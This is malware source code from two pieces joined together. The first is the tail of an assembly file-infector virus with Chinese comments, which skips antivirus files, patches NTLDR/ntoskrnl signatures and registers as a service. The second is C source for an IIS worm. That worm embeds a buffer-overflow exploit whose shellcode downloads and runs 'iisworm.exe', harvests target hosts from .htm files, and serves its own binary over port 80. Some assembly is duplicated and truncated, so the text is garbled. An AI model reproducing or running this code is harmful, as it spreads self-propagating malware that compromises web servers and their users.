;**********************************************************************************************
RelocAdvapi32:
lea eax,[offset ADVAPI32_Name + ebx]
push eax
call LoadLibraryA
or eax,eax
jz short RA_00 push eax
lea esi,[offset ADVAPI32_Functions + ebx]
push esi
call DLL_Relocate RA_00:
ret
;**********************************************************************************************
; 打开文件子程序
;**********************************************************************************************
OpenFile:
push 20
push o_Filename
call SetFileAttributesA push 00
push 80 ; 普通属性
push o_OpenMode
push 00
push 00 ; 不共享,
push 0C0000000 ; 读写方式
push o_Filename
call CreateFileA
ret
;**********************************************************************************************
; 建立文件影象,找点资料看看吧
;**********************************************************************************************
MapFile:
push 00
push m_FileSize
push 00
push 04
push 00
push m_FileHandle
call CreateFileM
;**********************************************************************************************
; 建立文件影象,找点资料看看吧
;**********************************************************************************************
MapFile:
push 00
push m_FileSize
push 00
push 04
push 00
push m_FileHandle
call CreateFileMappingA
ret
ViewMap:
push 00
push 00
push 00
push 02
push v_MapHandle
call MapViewOfFile
ret
;**********************************************************************************************
; 延时,没什么说的了
;**********************************************************************************************
Wait_A_Little:
call GetTickCount
sub eax,[offset Tick + ebx]
cmp eax,4000
jc short WAL_00 push 16000
call Sleep call GetTickCount
mov [offset Tick + ebx],eax
WAL_00:
ret
GetRand:
push ecx
push edx
mov eax,[offset Rand + ebx]
xor edx,edx
mov ecx,7FFFFFFF
mul ecx
inc eax
mov ecx,0FFFFFFFBh
div ecx
mov eax,edx
mov [offset Rand + ebx],eax
pop edx
pop ecx
ret
;**********************************************************************************************
;以下是一些数据
;**********************************************************************************************
HostCode db 8 dup (?) GPA_Sigs: W9x db 0C2,04,00,57,6A,22,2Bh,0D2
NT4 db 0C2,04,00,55,8Bh,4C,24,0C
W2K db 00F,00,00,55,8Bh,0ECh,51,51 NTLDR db 'NTLDR',0 NT4_NTLDR db 3Bh,46,58,74,07 ;WINDOWS_NT4的NTLDR的标志
db 3Bh,46,58,0EBh,07
W2K_NTLDR db 3Bh,47,58,74,07
db 3Bh,47,58,0EBh,07 ;WIN2K的NTLDR的标志 NTOSKRNL db 'WINNT\System32\ntoskrnl.exe',0 NT4_NTOSKRNL db 8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00 ;标志
db 0B0,01,5F,5E,5Bh,5Dh,0C2,28,00
W2K_NTOSKRNL db 8A,45,14,5F,5E,5Bh,5Dh,0C2,28 ;同上
db 0B0,01,90,5F,5E,5Bh,5Dh,0C2,28
;**********************************************************************************************
;以下是一些杀毒软件的文件不感染,你可以加点国产的杀毒软件的名字,
;**********************************************************************************************
SkipNames: dd 139D7300h ; aler
dd 0F977200h ; amon
dd 118E7E1Eh ; _avp
dd 52886900h ; avp3
dd 0C886900h ; avpm
dd 13883207h ; f-pr
dd 168E7E0Fh ; navw
dd 0F997C12h ; scan
dd 128B7212h ; smss
dd 04907B05h ; ddhe
dd 00946F05h ; dpla
dd 00946F0Ch ; mpla
Process db 'flcss.exe',0
Service db 'FLC',0 ; Import节表 VImports:
dd offset Kernel32_Pointers
dd -1,-1
dd offset Kernel32_Name
dd offset Kernel32_Relocated
db 14 dup (0) Kernel32_Pointers dd offset Kernel32_Beep
Kernel32_Relocated dd offset Kernel32_Beep
Kernel32_Beep db ?,?,'Beep',0 ;*********************************************************************************************
; 病毒要调用的一些API,找点资料啃一啃吧,MASM32里的INC文件你能啃完的话,你就是绝顶高手了,
;
; 注: 绝顶高手--------没有头发的高手
;*********************************************************************************************
Kernel32_Name db 'KERNEL32.dll',0
Kernel32_Functions: CloseHandle: db 0B8,4 dup(?),0FF,0E0,'CloseHandle',0
CreateFileA: db 0B8,4 dup(?),0FF,0E0,'CreateFileA',0
CreateFileMappingA: db 0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0
CreateProcessA: db 0B8,4 dup(?),0FF,0E0,'CreateProcessA',0
CreateThread: db 0B8,4 dup(?),0FF,0E0,'CreateThread',0
FindFirstFileA: db 0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0
FindNextFileA: db 0B8,4 dup(?),0FF,0E0,'FindNextFileA',0
FindClose: db 0B8,4 dup(?),0FF,0E0,'FindClose',0
GetCurrentProcessId: db 0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0
GetDriveTypeA: db 0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0
GetFileSize: db 0B8,4 dup(?),0FF,0E0,'GetFileSize',0
GetProcAddress: db 0B8,4 dup(?),0FF,0E0,'GetProcAddress',0
GetTickCount: db 0B8,4 dup(?),0FF,0E0,'GetTickCount',0
GetSystemDirectoryA: db 0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0
LoadLibraryA: db 0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0
MapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0
ReadFile: db 0B8,4 dup(?),0FF,0E0,'ReadFile',0
SetFileAttributesA: db 0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0
SetFileTime: db 0B8,4 dup(?),0FF,0E0,'SetFileTime',0
Sleep: db 0B8,4 dup(?),0FF,0E0,'Sleep',0
UnmapViewOfFile: db 0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0
VirtualAlloc: db 0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0
VirtualFree: db 0B8,4 dup(?),0FF,0E0,'VirtualFree',0
WriteFile: db 0B8,4 dup(?),0FF,0E0,'WriteFile',0 ;注:下面的API在WIN9X中是没有的 db 0
RegisterServiceProcess: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0 USER32_Name db 'USER32.dll',0
RegisterClassA: db 0B8,4 dup(?),0FF,0E0,'RegisterClassA',0 ADVAPI32_Name db 'ADVAPI32.dll',0
ADVAPI32_Functions: OpenSCManagerA: db 0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0
OpenServiceA: db 0B8,4 dup(?),0FF,0E0,'OpenServiceA',0
CreateServiceA: db 0B8,4 dup(?),0FF,0E0,'CreateServiceA',0
StartServiceA: db 0B8,4 dup(?),0FF,0E0,'StartServiceA',0
StartServiceCtrlDispatcherA: db 0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0
RegisterServiceCtrlHandlerA: db 0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0
SetServiceStatus: db 0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0 MPR_Name db 'MPR.dll',0 MPR_Functions: WNetOpenEnumA: db 0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0
WNetEnumResourceA: db 0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0
WNetCloseEnum: db 0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0 ;病毒应该是在这里就结束了
vend: Kernel32_Base dd ?
Rand dd ?
Tick dd ?
OS db ? ALIGN 100 Buffer1 db 200 dup (0) ; 此处应该是用于存放当前目录
Buffer2 db 200 dup (?)
Buffer3 db 2000 dup (?) ;此处用于存放读入的文件 CODE ENDS END main
的病毒的源代码拿出来了
#include <windows.h>
#include <winbase.h>
#include <winsock.h>char *mybytes;
unsigned long sizemybytes;unsigned long __stdcall doweb(void *inr) {
char buf[1024];
SOCKET in = *((SOCKET *)inr);
recv(in,buf,1024,0);
send(in,mybytes,sizemybytes,0);
closesocket(in);
return 0;
}// this is the sploit code written by Dark Spyrit, it downloads a file and runs it
char sploit[] = { 0x47,
0x45, 0x54, 0x20, 0x2F, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xB0, 0x87, 0x67, 0x68, 0xB0, 0x87, 0x67,
0x68, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x90, 0x33, 0xC0, 0x50, 0x5B, 0x53, 0x59, 0x8B,
0xDE, 0x66, 0xB8, 0x21, 0x02, 0x03, 0xD8, 0x32, 0xC0, 0xD7, 0x2C, 0x21, 0x88, 0x03, 0x4B,
0x3C, 0xDE, 0x75, 0xF4, 0x43, 0x43, 0xBA, 0xD0, 0x10, 0x67, 0x68, 0x52, 0x51, 0x53, 0xFF,
0x12, 0x8B, 0xF0, 0x8B, 0xF9, 0xFC, 0x59, 0xB1, 0x06, 0x90, 0x5A, 0x43, 0x32, 0xC0, 0xD7,
0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54,
0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0,
0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x5A, 0x33, 0xC9, 0x50,
0x58, 0xB1, 0x05, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4,
0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x33,
0xC0, 0x50, 0x40, 0x50, 0x40, 0x50, 0xFF, 0x57, 0xF4, 0x89, 0x47, 0xCC, 0x33, 0xC0, 0x50,
0x50, 0xB0, 0x02, 0x66, 0xAB, 0x58, 0xB4, 0x50, 0x66, 0xAB, 0x58, 0xAB, 0xAB, 0xAB, 0xB1,
0x21, 0x90, 0x66, 0x83, 0xC3, 0x16, 0x8B, 0xF3, 0x43, 0x32, 0xC0, 0xD7, 0x3A, 0xC8, 0x75,
0xF8, 0x32, 0xC0, 0x88, 0x03, 0x56, 0xFF, 0x57, 0xEC, 0x90, 0x66, 0x83, 0xEF, 0x10, 0x92,
0x8B, 0x52, 0x0C, 0x8B, 0x12, 0x8B, 0x12, 0x92, 0x8B, 0xD7, 0x89, 0x42, 0x04, 0x52, 0x6A,
0x10, 0x52, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF8, 0x5A, 0x66, 0x83, 0xEE, 0x08, 0x56, 0x43,
0x8B, 0xF3, 0xFC, 0xAC, 0x84, 0xC0, 0x75, 0xFB, 0x41, 0x4E, 0xC7, 0x06, 0x8D, 0x8A, 0x8D,
0x8A, 0x81, 0x36, 0x80, 0x80, 0x80, 0x80, 0x33, 0xC0, 0x50, 0x50, 0x6A, 0x48, 0x53, 0xFF,
0x77, 0xCC, 0xFF, 0x57, 0xF0, 0x58, 0x5B, 0x8B, 0xD0, 0x66, 0xB8, 0xFF, 0x0F, 0x50, 0x52,
0x50, 0x52, 0xFF, 0x57, 0xE8, 0x8B, 0xF0, 0x58, 0x90, 0x90, 0x90, 0x90, 0x50, 0x53, 0xFF,
0x57, 0xD4, 0x8B, 0xE8, 0x33, 0xC0, 0x5A, 0x52, 0x50, 0x52, 0x56, 0xFF, 0x77, 0xCC, 0xFF,
0x57, 0xEC, 0x80, 0xFC, 0xFF, 0x74, 0x0F, 0x50, 0x56, 0x55, 0xFF, 0x57, 0xD8, 0x80, 0xFC,
0xFF, 0x74, 0x04, 0x85, 0xC0, 0x75, 0xDF, 0x55, 0xFF, 0x57, 0xDC, 0x33, 0xC0, 0x40, 0x50,
0x53, 0xFF, 0x57, 0xE4, 0x90, 0x90, 0x90, 0x90, 0xFF, 0x6C, 0x66, 0x73, 0x6F, 0x66, 0x6D,
0x54, 0x53, 0x21, 0x80, 0x8D, 0x84, 0x93, 0x86, 0x82, 0x95, 0x21, 0x80, 0x8D, 0x98, 0x93,
0x8A, 0x95, 0x86, 0x21, 0x80, 0x8D, 0x84, 0x8D, 0x90, 0x94, 0x86, 0x21, 0x80, 0x8D, 0x90,
0x91, 0x86, 0x8F, 0x21, 0x78, 0x8A, 0x8F, 0x66, 0x99, 0x86, 0x84, 0x21, 0x68, 0x8D, 0x90,
0x83, 0x82, 0x8D, 0x62, 0x8D, 0x8D, 0x90, 0x84, 0x21, 0x78, 0x74, 0x70, 0x64, 0x6C, 0x54,
0x53, 0x21, 0x93, 0x86, 0x84, 0x97, 0x21, 0x94, 0x86, 0x8F, 0x85, 0x21, 0x94, 0x90, 0x84,
0x8C, 0x86, 0x95, 0x21, 0x84, 0x90, 0x8F, 0x8F, 0x86, 0x84, 0x95, 0x21, 0x88, 0x86, 0x95,
0x89, 0x90, 0x94, 0x95, 0x83, 0x9A, 0x8F, 0x82, 0x8E, 0x86, 0x21, 0x90, 0x98, 0x8F, 0x4F,
0x86, 0x99, 0x86, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x2E,
0x68, 0x74, 0x72, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x30, 0x0D, 0x0A, 0x0D,
0x0A };
void attack(char *host) {
SOCKET s;
struct hostent *he;
SOCKADDR_IN sout;
int i;
s = socket(AF_INET,SOCK_STREAM,0);
he = gethostbyname(host);
if (!he) return;
sout.sin_family = AF_INET;
sout.sin_addr.s_addr = *((unsigned long *)he->h_addr_list[0]);
sout.sin_port = htons(80);
i = connect(s,(LPSOCKADDR)&sout,sizeof(sout));
if (i!=0) return;
send(s,sploit,sizeof(sploit),0);
closesocket(s);
}void search(char *path) {
WIN32_FIND_DATA wfd;
HANDLE h,hf;
int s;
unsigned long bytesread;
char *b,*v,*m; /* here we need to change into the directory that contains all the .htm files..
I assume that there is a registry entry that says where IIS keeps all the .htm
files that we can pull out and chdir to here.. I think it is in
HKEY_LOCAL_MACHINE\SYSTEM\CURRENT_CONTROL_SET\SERVICES\W3SVC\PARAMETERS in an
entry call "Virtual Roots" but I don't have IIS so I can't test any of this :( So I'll just change to the most common default directories
*/ if (!SetCurrentDirectory(path)) return; h = FindFirstFile("*.htm*",&wfd);
if (h!=INVALID_HANDLE_VALUE) do {
hf = CreateFile(wfd.cFileName,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
s = GetFileSize(hf,NULL);
m = b = (char *)malloc(s+1);
ReadFile(hf,b,s,&bytesread,0);
CloseHandle(hf);
b[s]=0;
while (*b) {
v=strstr(b,"http://")+7;
if ((int)v==7) break;
b=strchr(v,'/');
if (!b) break;
*(b++)=0;
attack(v);
}
free(m);
} while (FindNextFile(h,&wfd));
}unsigned long __stdcall hunt(void *inr) {
search("\\wwwroot");
search("\\www root");
search("\\inetpub\\wwwroot");
search("\\inetpub\\www root");
search("\\webshare\\wwwroot");
return 0;
}
void setuphostname() {
char s[1024];
struct hostent *he;
int i; gethostname(s,1024);
he = gethostbyname(s);
strcpy(s,he->h_name);
strcat(s,"!GET /iisworm.exe");
for (i=0; i<strlen(s); i++) s[i]+=0x21;
memcpy(sploit+sizeof(sploit)-102,he->h_name,strlen(he->h_name));
}void main(int argc,char **argv) {
WORD wVersionRequested;
WSADATA wsaData;
int err;
SOCKADDR_IN sin,sout;
int soutsize=sizeof(sout);
unsigned long threadid,bytesread;
SOCKET s,in;
wVersionRequested = MAKEWORD(1, 1);
HANDLE hf; string sfname;
GetModuleFileName(NULL,sfname,MAX_PATH) hf = CreateFile(sfname,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizemybytes = GetFileSize(hf,NULL);
mybytes = (char *)malloc(sizemybytes);
ReadFile(hf,mybytes,sizemybytes,&bytesread,0);
CloseHandle(hf); err = WSAStartup(wVersionRequested, &wsaData); if (err != 0)
return; setuphostname(); CreateThread(0,0,hunt,&in,0,&threadid); s = socket(AF_INET,SOCK_STREAM,0); if (s==-1)
return; sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(80);
if (bind(s, (LPSOCKADDR)&sin, sizeof (sin))!=0) return; if (listen(s,5)!=0) return; while (1) {
in = accept(s,(sockaddr *)&sout,&soutsize);
CreateThread(0,0,doweb,&in,0,&threadid);
}
}